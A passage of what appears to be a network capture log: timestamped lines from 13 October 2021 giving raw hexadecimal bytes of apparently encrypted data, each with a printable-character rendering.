fa 96 a3 d5 57 db 35 90 c1 43 37 9f 6b 7f 5e bc 98 5c d2 cd 9f d1 9f 1e ca 76 5c fe 55 db
                                                                      Data Ascii: U"8fu>cZE-NXMF%+9!&qbIY1(gTw4bG&wMrBM[31+T&D>erJ@L["M'pF7W^Yg&3"c?*poZ7eO\?q1_X[Y[W5C7k^\v\U
                                                                      2021-10-13 16:06:31 UTC52INData Raw: f2 89 98 9c 08 e0 f5 4b 47 51 2f 3f 16 48 ee b1 24 d6 ff 10 62 79 49 78 fd de 99 de 7b da a7 2d a8 e8 4c dc d1 9e f4 8a b4 02 f0 af fd 5d d7 63 65 d3 ad ae 59 d1 78 36 e0 b0 1d 26 e1 0d ce 74 2b 2b 89 5a b4 de 7c 7e 4f 8b 8a 25 4f cb bc 0e 29 88 a3 a4 e7 1d bb 0b 31 5a 38 56 cc 23 c3 37 6f ea 74 fb a6 d0 0d a4 ba 60 68 cb f6 36 5f 3b ea 39 b6 ae 67 fe 52 2b 20 cf 3d 5e 3c d3 d6 f9 27 12 9c 05 d2 93 2e c7 0d 87 fb a9 82 5c ea a7 2b 6d c4 ed cc d2 bd 27 cc e9 fb c1 67 63 f5 60 37 f8 b5 84 12 d7 bb e9 17 48 5c 4e 62 8b 6e 22 97 c8 ed 49 c6 7e 55 77 f3 0e 1c 2e 0b cd 1a 01 e8 65 03 67 57 ee c1 bf 5f 17 4d 5d e9 b9 43 08 16 0c fc 68 79 fc ab 27 1d 78 b3 73 ed 1e d0 bd b1 5b 77 2c 2f f4 c5 fe 36 20 70 f3 62 12 2a 89 e5 67 bd 42 5e 0f 65 77 5a 5f 80 6d f2 5a 1e
                                                                      Data Ascii: KGQ/?H$byIx{-L]ceYx6&t++Z|~O%O)1Z8V#7ot`h6_;9gR+ =^<'.\+m'gc`7H\Nbn"I~Uw.egW_M]Chy'xs[w,/6 pb*gB^ewZ_mZ
                                                                      2021-10-13 16:06:31 UTC54INData Raw: 25 60 07 93 d0 6b dd 8c bd 9e 1f ab 0e 4e 54 e0 c3 f4 8d 83 82 5c c6 a3 70 eb c8 9e ab b3 6b b6 da 96 ea 7a 39 8a 6b bc 5c bc 94 30 49 da f0 34 b3 3b d1 58 98 fa 7d 3d 63 f2 63 bb 14 5f f3 f9 10 8c c5 8e 2c a6 0e 2a 4d 74 2c bb 61 55 c2 3a d4 f4 c0 44 ec 26 9d 81 56 39 2d 98 90 66 92 b3 57 f5 5a cc af 13 ed 9e f0 e3 dd 17 0e 28 74 b6 59 72 06 16 48 55 82 1b 49 01 e5 4b 66 f1 9b ee 7d 0b 6f fb 0f cd 1e 5d 05 6f 1b 78 0a d7 fa 8a 6e c4 b7 7f 23 bd 84 dc 08 70 34 48 a9 df b2 ba c0 51 17 f6 95 55 b1 41 63 84 a0 fa 52 40 57 03 81 bb b9 4a d9 2e 41 3f 0e fc b9 e3 8f a1 fd 4c 42 8a f5 1d ed d1 20 b5 bf 89 be 1e 65 11 81 d4 80 64 1e ed e2 ec 14 b4 bb 9c 38 87 64 5e 8d ff b4 7b ee c9 ba eb 3a c8 09 31 eb 8b 81 9e ba 89 6c 42 0a ea 0f 35 b2 06 9e a6 58 d5 72 e4 83
                                                                      Data Ascii: %`kNT\pkz9k\0I4;X}=cc_,*Mt,aU:D&V9-fWZ(tYrHUIKf}o]oxn#p4HQUAcR@WJ.A?LB ed8d^{:1lB5Xr
                                                                      2021-10-13 16:06:31 UTC55INData Raw: b7 db ac 41 94 d3 bf 52 1a 2a e3 fa 55 72 cc 58 35 1d 6f b2 65 b9 c2 d3 91 b8 59 70 2c 2b 6b 77 e9 04 20 70 f5 12 12 3b 9b e3 67 a5 4e ab 61 6d 7e 4b 5d b9 da e2 53 7b fb 60 f9 32 6c cd 79 1e 7b f9 84 90 d9 17 ed 70 9c b8 6f f9 47 96 e8 f6 0e 02 72 3f 2f 78 b4 d4 80 58 bb 5b af 4a b2 f4 2f 52 bc 5f 0e 76 86 15 c7 28 17 33 e3 8e ce 9a a2 1a e4 ec c5 a2 c5 7b 40 54 9e 90 97 fc 9c 64 11 e4 84 27 4c af 2d 90 5f b7 d6 11 c7 ba 81 ee 74 e5 34 a5 ad a0 9b 00 30 53 51 3a 71 08 d7 2c 8d af 98 6f 11 13 7d 5e 40 f7 da 83 81 e3 35 dd f3 02 f4 05 8d cf 78 b5 cf 8f f5 45 67 2b 7c b9 a9 b5 ef 37 ca 8a 5b 64 04 da 52 c5 b9 72 dd 17 5c b3 5a 1f 81 db dd ec 28 22 12 46 e8 b5 97 5b 04 54 3f ce e9 a4 d1 6d f4 20 7a 78 10 ce 4f 51 5a 0e 4c 0d a8 0e 8c 18 57 96 db cd 76 2d b0
                                                                      Data Ascii: AR*UrX5oeYp,+kw p;gNam~K]S{`2ly{poGr?/xX[J/R_v(3{@Td'L-_t40SQ:q,o}^@5xEg+|7[dRr\Z("F[T?m zxOQZLWv-
                                                                      2021-10-13 16:06:31 UTC56INData Raw: be ae d3 25 08 74 ba 91 c4 1a 1d d7 ed e2 e6 0c 6e d4 73 38 87 6e 54 9c f4 a5 a8 75 e1 b0 26 3b ce 66 da eb 8b 8b 95 b1 98 7d 4e ec 75 27 56 b7 06 98 bc a6 d5 63 9d 66 06 e3 f1 35 b7 ef de c7 d0 a0 d7 75 6e 06 f9 71 79 6a e4 b2 59 5f 8f 64 85 6c bc 7e 88 af 7d bb 7b f8 07 3c 8c ed fc 3e eb e0 80 99 e5 78 4e ea 13 f6 73 08 91 ff 58 50 51 b7 3d 16 44 f7 de 09 d3 90 d3 4a a1 40 62 ca e7 e7 f2 73 b5 85 02 af e8 56 10 df 99 9b ae 68 16 d3 96 db 4c d2 06 50 d5 ab a3 60 f8 50 3a ee 6d 12 48 cb 0f b0 4e 2d 3a 92 1d 79 dc 7c 72 49 f4 a0 f3 5c d1 a1 16 57 2e 9c b9 12 ef 4d 09 36 5b fd 48 fd f0 ca 26 7c c5 d9 17 54 b5 c0 b4 e1 74 5f cb fc 14 95 2a 99 85 a7 ab 45 d7 7a 13 2a d8 58 bd 3e d5 f6 e3 0b 3a ce 18 d2 99 3f c1 25 5d d9 a9 84 33 9d a4 2b 67 56 fd cc d2 b3 48
                                                                      Data Ascii: %tns8nTu&;f}Nu'Vcf5unqyjY_dl~}{<>xNsXPQ=DJ@bsVhLP`P:mHN-:y|rI\W.M6[H&|Tt_*Ez*X>:?%]3+gVH
                                                                      2021-10-13 16:06:31 UTC57INData Raw: 72 3c f4 4d d6 a1 5f c7 76 f8 4d 5b 39 8d 0f 13 e2 37 2b 10 51 c0 f8 85 44 08 a7 37 ca 03 9f e1 94 23 3b 66 73 05 f4 12 40 48 17 48 f7 a0 0a 7b 0a 5b ff 3a 2a 75 27 ae b1 2d 57 83 2e 4e 50 17 5a 0b bf c5 89 98 5c 1f 0e d5 4f 94 c9 9d de 97 c0 98 84 b9 f4 be 30 93 2e e6 7c d4 e9 52 06 ee a5 9a ee 29 3c 6e 52 24 66 25 9b 4e 43 30 a7 e0 98 0a bb 2a 1b 5d c8 e7 e0 17 ad 97 75 e8 a5 58 7d de b0 f2 af 6f b6 da 96 d2 40 39 86 52 54 77 59 91 5f d2 cb f6 16 b8 1e c0 54 e6 d7 57 d1 66 e3 6c bf 0a 18 93 fa 10 80 c3 1d 15 4a 62 0c 49 61 3c 82 2c 7c e2 34 c2 68 c0 48 ec 26 9d 96 41 18 af 8e 91 60 f7 47 5a d0 74 fd be 15 88 98 fb cb ef 06 04 4d 6d b6 87 6d 19 f5 81 aa 7d cf 4c 1b 9c 84 5d f1 91 e4 79 3f 7e f1 70 28 1c 5b 2e 07 66 78 0a dd 67 af 66 d3 61 6c 2b ac 37 cd
                                                                      Data Ascii: r<M_vM[97+QD7#;fs@HH{[:*u'-W.NPZ\O0.|R)<nR$f%NC0*]uX}o@9RTwY_TWflJbIa<,|4hH&A`GZtMmm}L]y?~p([.fxgfal+7
                                                                      2021-10-13 16:06:31 UTC59INData Raw: 6f fb 70 c2 ba 4a 1e ab d7 5b 79 cf d4 82 86 38 e0 20 b7 83 a6 db 52 21 3b de 88 74 e6 cc f3 fb 26 12 13 04 d2 93 20 d1 0d b4 f9 a9 8e e5 47 9f 76 bd a3 fa c4 c3 a3 60 3e e9 fb c1 f8 37 e4 66 1e 0b 85 85 14 b2 05 f9 11 55 fe 4f 64 9a 73 20 99 e7 d5 9e e5 82 5d 59 00 bc 1d 24 0b 67 1a 29 df 7e 10 65 6d c8 d2 b7 d7 aa 72 bf c1 bf 49 d6 3d 1b d1 79 71 95 57 27 1d 7e a0 7a 9e 3c d2 bd b7 32 7c 3d 25 9f c1 d6 e8 32 70 f5 0d 20 28 89 e2 6d 87 54 55 66 40 75 5a 27 91 67 f2 51 7b f4 68 85 c1 6d dc 61 1d da cb a0 98 b0 eb e5 71 96 a1 60 e2 7c 18 e8 e7 16 35 30 c0 2e 5e a9 b6 ae 71 b9 55 bc 4a cc d8 39 7a 92 44 2b 63 83 98 d1 3a 08 3b 0e 87 f3 95 a2 77 8d f3 cf b5 75 6a 59 52 95 a3 a0 fc b0 68 2b a3 8f 13 76 b9 2d 87 5a 25 dc ef c6 97 9a f7 6c fe 33 ad 2f 38 89 00
                                                                      Data Ascii: opJ[y8 R!;t& Gv`>7fUOds ]Y$g)~emrI=yqW'~z<2|=%2p (mTUf@uZ'gQ{hmaq`|50.^qUJ9zD+c:;wujYRh+v-Z%l3/8
                                                                      2021-10-13 16:06:31 UTC60INData Raw: 54 f5 56 e2 22 15 82 81 e2 e5 de 2e 93 44 b3 b0 71 56 3e dd b0 82 98 c4 5f 1a c7 a2 5d f1 91 fc 55 01 56 01 79 f6 18 75 2a 02 4c 7e 22 38 27 9b 6c fb fd 6c 2b a6 9f ca 07 d6 14 74 d3 27 65 6b 1c 44 34 f6 47 54 b1 41 58 1f d3 40 58 53 58 19 af ab 97 48 d3 f6 55 11 0a fb 93 e9 99 1e c8 5d 45 a0 db 1f ed 81 36 9d 91 c3 bf 14 73 4f 81 8b ac 75 0a e1 3f 4b 14 b4 bb 8d 3e af 4a 5a 8d f9 a2 90 c1 c9 ba 28 2d e6 49 57 c9 89 81 82 a9 81 7c 51 12 b8 0d 5d b5 69 b6 d1 58 d3 72 9f 28 2c f9 c4 3c a6 f9 55 d9 d0 af ee 67 f5 69 36 1e 5f 62 f3 6e 27 b8 a7 27 8b 7f bf 00 a9 bc 6d aa aa 73 19 42 92 fd ec 23 e3 2f 9c 72 e7 78 42 e1 c0 88 95 20 c6 f7 4b 50 4d bd 3d 16 44 f5 c6 09 d1 90 3e 48 a1 4c 69 f2 d8 f3 cb 79 db ad 06 c0 c8 45 01 c8 8e fd a2 29 12 d5 81 a5 77 d5 69 70
                                                                      Data Ascii: TV".DqV>_]UVyu*L~"8'll+t'ekD4GTAX@XSXHU]E6sOu?K>JZ(-IW|Q]iXr(,<Ugi6_bn''msB#/rxB KPM=D>HLiyE)wip
                                                                      2021-10-13 16:06:31 UTC61INData Raw: 05 50 ba 46 3a 68 85 11 b9 1e 0a 3a 1b 9e ef 9a db 2f eb f3 c9 a0 da 53 18 42 81 8d 06 d7 b2 62 3c a3 8a 36 30 a8 2c 81 47 76 ce ca ee a1 89 ff 77 e5 2b c9 19 b3 89 0a 2c 69 76 2c 8f 03 25 1f 8d b4 98 23 11 0e 73 58 42 f7 54 25 ac 24 c5 dc 0d 3f f5 04 48 cc 61 ab da 8c e5 6a fe ca 9d b8 76 8c c0 0e ed 9d 8d 7d 07 ca 3e 6c ab 72 c6 08 6a 75 5b 33 8c 0c cc e4 1d 22 2b 54 e8 e5 b1 44 0e aa 3e e2 e0 59 e1 92 0b 02 65 73 03 7e 4e 40 48 04 5b f3 a9 38 9d 09 5a f9 12 cd 76 75 a8 99 70 d0 82 28 5d 8f 1f 72 e3 a9 c5 8f b0 af 1c 0e d2 74 f9 ca 9d 2f 84 c8 91 28 a5 f0 af 20 a8 35 da b6 d2 c1 0f 06 ff a5 96 e0 de 15 5c 5e 2d 77 db 89 55 49 25 89 bd 89 0c a2 2c f4 54 cc c0 eb 06 ae b3 6b d9 ae 4b 71 c8 8f a7 c4 b3 b5 f6 99 e9 67 2a 8f 45 5b 46 af 94 5f c5 dc e7 c0 9e
                                                                      Data Ascii: PF:h:/SBb<60,Gvw+,iv,%#sXBT%$?Hajv}>lrju[3"+TD>Yes~N@H[8Zvup(]rt/( 5\^-wUI%,TkKqg*E[F_
                                                                      2021-10-13 16:06:31 UTC63INData Raw: e6 7a ef 50 79 69 43 ef e9 0b 9c 08 91 69 5a 51 3c 8a 4e 8a 53 e3 d0 11 f6 5c 1a 4a a1 d6 69 fc d6 fc c3 c2 da ad 00 33 ff 40 1e c5 bf 12 8a 6a 16 49 96 cd 42 db 76 25 4b ba a2 6e e4 67 4c 76 7c 13 38 ef 2d 25 48 2b 2b 1f 63 6b c2 73 67 24 78 a6 22 50 d1 a6 9a 57 3e bd b5 fb 8c a3 1f 20 5e 3d c7 e5 e6 dc 24 79 67 6b ed b4 5e 08 3d d5 5b 77 de ea 82 97 3f f5 29 87 54 4f da 52 b7 3b df 4d 74 2a 4f cd ed 3e 22 99 98 c3 9e 20 d8 05 dd f8 a9 84 af 49 a1 34 7d a6 63 dd d5 b9 53 c2 74 ea cc 6b 74 f2 fa 0e 24 a9 99 34 38 09 e8 17 de 39 5b 7d 95 55 b1 90 d9 eb fd 0b 7a 4a 6e 8a 20 0c 29 1e 99 28 fe e8 7e 10 f3 54 e1 cf 96 c7 3c 4b 80 de 9d 55 94 2c 1a e4 5a 67 48 5a 20 02 5a 80 fa 9e 3c d2 21 a6 4f 62 18 33 79 d1 d1 f7 06 50 75 0d 3a 28 15 f2 71 a8 74 43 fc 50 72
                                                                      Data Ascii: zPyiCiZQ<NS\Ji3@jIBv%KngLv|8-%H++cksg$x"PW> ^=$ygk^=[w?)TOR;Mt*O>" I4}cStkt$489[}UzJn )(~T<KU,ZgHZ Z<!Ob3yPu:(qtCPr
                                                                      2021-10-13 16:06:31 UTC64INData Raw: a9 a1 b1 24 14 76 39 94 61 0d 8e e8 52 2f 96 c3 a4 0a bd 2c 22 0c e4 c9 e4 78 1b 80 5d cc 07 49 6e c4 96 b2 cd 5b a7 ca a8 1f 4b 28 8f 52 41 4e ac 08 52 dd e3 3c 3c 9f 1e c9 31 38 fe 55 db 73 e1 73 bd 10 4f 06 fa 10 86 c3 07 15 5f 97 39 4f 68 2b 97 4a e4 c3 30 c8 7d aa 11 8f 27 9b 9a 43 17 d1 9e b8 3a f9 99 53 9a ee cb be 1f 96 75 f0 f5 29 07 15 42 9b ed 5d 78 3a b2 04 ab 7d cf 4b ee ee 28 a3 f0 8a ea 79 5b 7a f1 7c 99 ac 5c 04 0a 58 86 0b cb d8 9a 06 c2 64 44 76 a8 8c cb 6e 4c 82 77 d9 35 b3 44 08 ba 33 be b3 50 99 15 74 83 d5 2f e0 41 5d 02 bd 7d b8 5c 2d f1 23 66 1d ed 91 e3 8f 93 eb 4e 42 8e e6 17 f7 0a 35 b5 bf c2 ac 04 74 ab 96 fc db 76 1e eb 40 fd 0e a3 93 c0 3c 87 62 fa 9c e5 ac 90 b2 cd ba 24 99 d9 13 3d c3 d5 85 84 bc 2b 7c 43 29 e6 27 73 b1 06
                                                                      Data Ascii: $v9aR/,"x]In[K(RANR<<18UssO_9Oh+J0}'C:Su)B]x:}K(y[z|\XdDvnLw5D3Pt/A]}\-#fNB5tv@<b$=+|C)'s
                                                                      2021-10-13 16:06:31 UTC65INData Raw: fe 77 9e d8 52 3c c3 a9 c2 aa 71 9e d0 bb 52 02 34 0c f1 e3 59 bd 4f 27 1b 56 84 7a 9e 36 70 ac bd 5f ab 2e 2f f4 ca c7 f6 11 91 fd 83 8d 3e b8 d4 60 a4 58 5c ee f6 64 5e d7 26 70 39 40 6e e5 72 c1 3f 7d d8 7a 0e 8d e9 a3 00 8f ee e9 70 90 83 4e e4 54 8e 4a f6 17 0a 80 d2 25 45 a8 d2 5e 63 b5 4e a3 5d c2 ef f6 21 55 41 2b 6f 87 1c c7 3e 1b 1b 0b 9c c2 a5 06 0c e9 f3 de 90 c6 5b cb 55 94 9a 7c e4 a7 7b 49 55 9a 3b 55 ae 3c 90 5c bc f3 6e c4 96 8f e9 f0 f1 25 ba a2 a7 9d 14 09 e2 4e 2c 85 21 a1 26 9c af 03 ca 02 1f 63 5a 41 f4 c8 85 1f c3 3b 23 f3 06 45 13 9e d5 4f e0 dc 9d ff 43 a3 b9 49 47 a8 98 f6 28 cc 8e 80 61 07 d6 65 f8 a9 72 ca 16 4d 5b 48 27 f5 f0 cc e2 31 38 11 45 f9 b0 ad 2f 0a aa 38 fb 6d 9b e1 92 0a cc 47 62 21 ca 5e 4e 60 00 5b f3 a3 80 8c 2b
                                                                      Data Ascii: wR<qR4YO'Vz6p_./>`X\d^&p9@nr?}zpNTJ%E^cN]!UA+o>[U|{IU;U<\n%N,!&cZA;#EOCIG(aerM[H'18E/8mGb!^N`[+
                                                                      2021-10-13 16:06:31 UTC66INData Raw: 2c b0 ba 5b cc 61 7a 3b ce 4a b5 2f c4 f7 a3 30 2a 9c 23 c3 be 2e e6 4a 7a fa a9 82 22 56 b1 a6 60 b0 ff cd c1 84 59 f6 fe ea dc f8 57 e4 66 1e 81 a7 a6 00 90 a7 e8 17 48 00 06 62 8b 7f 19 7a d8 eb 6b 32 a9 54 71 96 94 39 2e 01 b3 67 29 ea 7e 16 7e 52 f1 06 a4 c6 b1 54 90 4c b8 43 08 3c 0e dd 68 57 c2 5a 30 91 41 a0 7a 9f 9e c3 9b a3 60 d3 3d 25 ef df f6 64 1f 70 f5 0c 2c 00 3e e3 76 bd 7f 7a 71 4f 62 d7 5e 91 67 e2 40 52 e7 5d fc 31 7b 50 54 02 85 f9 0a 8b 84 90 c5 de 96 ab 60 fb 2b 08 d7 e7 1c 1c 40 e9 dc 55 a4 cf b2 2c 46 a0 50 5b ce cd 3c 45 a9 56 13 e0 96 15 d6 2b 07 12 53 8b e2 9b db 10 e8 f3 c5 9c c6 6a 5e 6e d1 8f 69 fb df 7b 3b a5 91 02 9b bd 2d 81 5c be c4 e6 10 85 91 ee 69 e0 16 eb b2 a5 91 d6 32 59 65 65 9e 19 e8 01 8d 82 9e d2 6d 3c 60 49 55
                                                                      Data Ascii: ,[az;J/0*#.Jz"V`YWfHbzk2Tq9.g)~~RTLC<hWZ0Az`=%dp,>vzqOb^g@R]1{PT`+@U,FP[<EV+Sj^ni{;-\i2Yeem<`IU
                                                                      2021-10-13 16:06:31 UTC67INData Raw: 72 28 d1 a7 a6 71 d1 4c 1c e6 b0 ea f9 15 58 61 c3 77 7f cd e1 c4 4a d2 8d 73 78 0a dc 35 9e 71 da ef db 3c 76 9f dc 12 f3 a8 6f c2 24 5c 48 09 9e 3b cf af c1 b9 5a 7d 94 09 d4 33 de 4c 05 be 55 aa 47 c2 fd 52 28 15 19 82 e6 01 57 de 96 55 5e 78 22 ed 87 21 a6 b9 d5 ae 1b eb 06 98 0e 93 60 0d e3 c9 be 05 b1 aa 92 ac 96 60 49 83 6b 6e ae c0 d1 ab 24 2a c6 18 21 fa 85 15 a4 45 89 6d 59 ec fe 0b 4c bd 92 44 4d 73 c5 72 91 28 24 87 e5 2f a8 6b 55 d5 d0 a5 52 bf 6a 6f 21 77 68 6e 67 40 dc b1 8f 6e a7 ab b8 6f 89 96 49 ac ad 68 1b 3c 89 eb 3a 3a 33 6b e1 41 f7 49 ec 2c c6 bc b4 3f 91 f5 41 45 2d bd 07 16 42 ee 11 18 d0 d5 1a 0b bd 4a 78 fb c9 f6 e3 7d da ad 00 bf ec 47 01 d8 9d f4 8a 65 16 d5 87 d0 5d d7 68 6d e7 a8 a5 5d e9 78 36 f0 6d 14 36 e3 0e 98 3c 2b 2b
                                                                      Data Ascii: r(qLXawJsx5q<vo$\H;Z}3LUGR(WU^x"!``Ikn$*!EmYLDMsr($/kURjo!whng@noIh<::3kAI,?AE-BJx}Ge]hm]x6m6<++
                                                                      2021-10-13 16:06:31 UTC68INData Raw: 03 fa f7 bc 97 d6 7b 5b 55 88 9a 60 ea df 4b 3b a5 91 2a 56 aa 42 ab 4c a8 d1 f0 de 1b a2 ff 7d f7 36 b0 bd 3e a2 00 21 40 5d 29 86 18 f1 2f 12 12 a7 d5 03 1f 68 58 57 f3 cb 98 9a 72 8c 3d da 38 f2 13 94 ce 63 a4 cd 98 e3 4a 5d 22 63 47 a2 88 ec 37 d0 f2 aa 76 14 cf 5c df ba 77 a3 2d 43 4d 51 22 8f bd e5 e3 37 21 0a 53 eb b2 86 ca b9 c5 12 e3 e0 96 f2 95 23 cc 64 73 09 cd 48 2f 50 10 5b f9 a5 2a 97 d7 4e dc 3a fa 76 27 a2 8a 7b 7f ad 2a 5d 50 14 5a db bc c5 85 6e b5 1a 24 d3 67 88 d5 9d d8 84 c8 91 ac a5 f0 be 36 8c 32 e2 7c e5 c0 0f 06 fb a3 89 e9 3a 14 70 57 3f 50 0b 84 2b 43 36 8f 2d 98 0a ac 55 6b 54 e0 c3 ef 1e c4 74 5c c6 af 4b 71 ca b6 c7 dd 4d be c9 95 d0 4f 39 8a 55 41 5a 32 25 30 22 db f0 34 94 19 d7 84 9e 29 d8 8e 60 f2 64 a2 13 71 a6 fd 06 97
                                                                      Data Ascii: {[U`K;*VBL}6>!@])/hXWr=8cJ]"cG7v\w-CMQ"7!S#dsH/P[*N:v'{*]PZn$g62|:pW?P+C6-UkTt\KqMO9UAZ2%0"4)`dq
                                                                      2021-10-13 16:06:31 UTC70INData Raw: 99 37 3e 3f e0 cf 1e fe 81 1e 4a a7 62 ef f8 c9 f0 90 87 db ad 0a c0 13 46 01 c4 97 dc f5 6e 16 d3 af 4a 59 d7 6f 5e 40 a8 a5 77 9a 84 37 ea 67 7b da e0 0d ba 40 03 56 87 72 6a f5 fd 7c 58 e2 9f b2 4c c1 b6 75 ba 38 a2 ae 82 ed b3 18 35 44 03 24 f0 e1 c5 1f ed ff 7a ec 83 dd 1d a1 c2 2f 94 ca fc 14 e9 c5 eb 3f ad a3 67 59 56 2b 2c f0 d6 67 3c d5 f4 7d 22 3a 89 77 2e 98 3f cb 4a a0 f9 a9 8e 3b 70 25 2f 67 b6 d7 48 d6 a6 4e fc 6d ff cb 72 1b 18 67 1f 29 d9 79 15 b8 03 e0 3f c4 2c 5c 64 a3 f1 35 90 df c3 e6 1e 7d 53 02 60 bd 1d 24 6e 44 09 01 e2 76 38 e7 41 e6 d6 9f 58 a4 5a 81 e9 28 40 08 3b 6e 07 78 71 de 24 da 1c 7e aa 6c 96 53 2c bc b7 42 6a e7 36 f7 d3 d2 d0 07 71 f5 0d 44 d7 88 e3 7c bf 42 51 0f 41 77 5a 53 ea 66 e1 53 7b 99 ce eb 20 66 cf 6c 13 82 d5
                                                                      Data Ascii: 7>?JbFnJYo^@w7g{@Vrj|XLu85D$z/?gYV+,g<}":w.?J;p%/gHNmrg)y?,\d5}S`$nDv8AXZ(@;nxq$~lS,Bj6qD|BQAwZSfS{ fl
                                                                      2021-10-13 16:06:31 UTC71INData Raw: 0a bc 36 0a 55 e0 c9 d7 16 65 82 5f ca bf 58 77 c9 8d 91 da 4d 9b d8 90 c1 df 28 8f 52 46 4c b4 aa 4a d6 da f0 3e 8e 16 d9 a0 88 d3 5c c0 67 e4 7a b9 9e 6d a4 f0 10 97 da 0c fa 4c 21 21 55 ec 11 93 25 55 d1 37 db 7d a7 62 ff 2e 86 6e 51 3d c9 8a 97 7a e2 ba c9 eb 4f c2 be 04 8a 94 e0 1d d6 2a 08 56 b5 ab 67 4b 3d dd b6 b5 6f d6 57 10 fe 36 42 fd 65 ee 7d 15 7c 7f cd e1 c4 4a d2 8d 67 78 0a dc 35 9e 79 de 72 64 2b bd 84 d2 15 00 82 5b d8 29 5a 2a 34 45 32 d4 bd 40 a2 43 70 92 db 5f 47 be 5c 24 a2 8b a1 25 fa f1 43 33 3b ed 80 eb 8f f1 c1 57 bc 89 d9 14 fc 80 38 aa d4 5f a3 0d 6d b1 91 dc 9f 78 e0 ec ce e5 05 b3 a6 81 a4 98 6f 4b 85 ff a5 b0 f0 de 44 23 17 db 0f 26 fd 89 0f 33 ab 8c 7b 36 3e ed 0f 57 95 19 86 c0 50 d5 72 9f 25 d4 97 cc 36 b7 f8 5d cd 5d b6
                                                                      Data Ascii: 6Ue_XwM(RFLJ>\gzmL!!U%U7}b.nQ=zO*VgK=oW6Be}|Jgx5yrd+[)Z*4E2@Cp_G\$%C3;W8_mxoKD#&3{6>WPr%6]]
                                                                      2021-10-13 16:06:31 UTC72INData Raw: 1a fd 74 ac a9 4a 27 1d 68 b1 7e f1 b4 d3 bd b1 5f a7 2e 2a f6 c5 ee a4 21 70 f5 1c 3e 39 8c f5 19 3e 52 55 66 52 73 72 1e 90 67 e9 42 75 e7 7b fd 4f e5 dd 6b 04 ea 60 a8 9a ad 97 ea 78 be b5 69 e4 52 95 ee cf 3b 1d 56 cb 06 7b a4 c5 82 49 45 5f af 4c cc d9 05 55 ba 40 00 76 9c 04 de 03 e4 3a 1d 8f f3 95 a0 21 71 f7 cf b7 c1 f6 56 46 81 8a 7d e9 a4 4a 99 a5 9b 31 4b 95 f7 82 4d ae cd 62 c1 96 89 fe 69 e2 31 92 00 b3 89 0a 09 dd 4e 2c 85 18 ff 0e 92 a4 8f f3 11 16 73 41 47 cd 42 96 93 fa 2d ae f5 2e f3 12 8a cb 73 92 7f 9d f5 5e 61 1c b8 44 a8 9f f3 ab dd 9d 8d 76 00 d1 59 fe 08 72 cc 0f 6a d1 5b 33 8c c1 c5 f3 3f 3f 29 cc ec a4 83 52 83 ad 3e e2 e1 88 f5 86 23 7c 65 73 09 c8 67 96 4b 11 5d e5 24 25 9d 09 5a ed 06 d9 5e 84 a8 99 7a 7f 1f 28 5d 5c 36 eb e7
                                                                      Data Ascii: tJ'h~_.*!p>9>RUfRsrgBu{Ok`xiR;V{IE_LU@v:!qVF}J1KMbi1N,sAGB-.s^aDvYrj[3??)R>#|esgK]$%Z^z(]\6
                                                                      2021-10-13 16:06:31 UTC73INData Raw: 66 01 8f 7e fd 1a ab ae 83 00 1b 75 56 92 e9 94 6d ef c9 ba be 2a c6 16 33 cb 70 81 84 ba 15 7c 57 25 f7 2f 86 b3 06 9e 4f 49 db 7c 8e 26 4e 0a f1 30 b9 e5 64 77 c1 ab c6 f9 e5 67 2f 6a 66 2b 6f 79 38 af 93 44 5c 7f b9 6f 1f af 63 b3 b0 7d 4b b1 96 f2 f3 37 26 e6 fe 5e fa 67 5b a1 55 88 92 05 8e e5 c6 7d 22 95 3e 05 4c f5 c1 0e f6 67 1a 4a a1 d6 69 f5 de e9 ec e7 cb a3 18 b0 86 db 10 c0 86 d4 44 6a 16 d5 1b db 53 cd 76 01 4b ba ab 6a f6 3b aa fb 63 08 38 ad 91 a1 46 36 34 c4 ee 7d d3 62 58 a1 e4 b7 25 d3 d0 be 19 4f 19 4b a4 ed 10 2e 09 31 53 21 44 fa 7d d2 39 70 f0 5a 68 ab 4a 1e 3d d5 52 77 c7 dc ea 86 38 ea a3 b6 a5 50 d7 4d 40 b6 c9 5c 7c 32 cc 90 76 30 34 90 0b f2 72 3f c1 25 c1 e9 a7 97 36 5f d5 a6 66 b0 f9 df d6 78 5c f1 c0 cc cb 74 62 f7 60 19 2f
                                                                      Data Ascii: f~uVm*3p|W%/OI|&N0dwg/jf+oy8D\oc}K7&^g[U}">LgJiDjSvKj;c8F64}bX%OK.1S!D}9pZhJ=Rw8PM@\|2v04r?%6_fx\tb`/
                                                                      2021-10-13 16:06:31 UTC75INData Raw: b3 5a 1f 84 c5 c3 e2 3e 37 ff 55 c4 a6 ae 46 25 29 39 c8 e0 9c fa a2 02 df 94 72 03 dc ef 40 48 00 28 49 a9 22 97 02 44 e5 3a 76 76 27 a2 93 76 7f 22 2c 5d 50 36 cc e3 bc cf fc a6 b7 1c 04 de 6e a6 de 9f d8 8e e5 9d 84 07 f4 be 30 93 2b e0 7c d8 c6 25 0f c6 00 8d e9 26 7b 69 54 24 6a 1e 88 5c 50 3d b7 21 99 0a bd 37 06 44 eb 53 f1 13 ba 85 32 dc a7 58 7d db 90 b7 cf 40 8c a9 91 c1 49 39 81 52 5d c5 af 94 4e d2 b5 7c 3f 9f 14 e8 fa 8d ff 53 f9 de f2 65 a4 11 72 a6 fd 38 b7 d2 14 0e 74 4a 2b 4b 61 49 44 24 54 c8 23 c5 7f a8 76 c6 5a 99 90 56 06 4d 9c 90 60 fc 8a 5a e4 53 dc af 10 20 9a fe f0 c7 17 14 53 a7 a1 d4 57 3c dd b7 b9 6c d4 4e 06 f8 a2 4c e0 8c c7 f6 07 7e fb 5c e7 0f 4b 94 2c 53 69 1a cb bc b3 77 d3 61 66 fb b9 8c cd 00 d6 97 77 d3 2b 65 71 1f 44
                                                                      Data Ascii: Z>7UF%)9r@H(I"D:vv'v",]P6n0+|%&{iT$j\P=!7DS2X}@I9R]N|?Ser8tJ+KaID$T#vZVM`ZS SW<lNL~\K,Siwafw+eqD
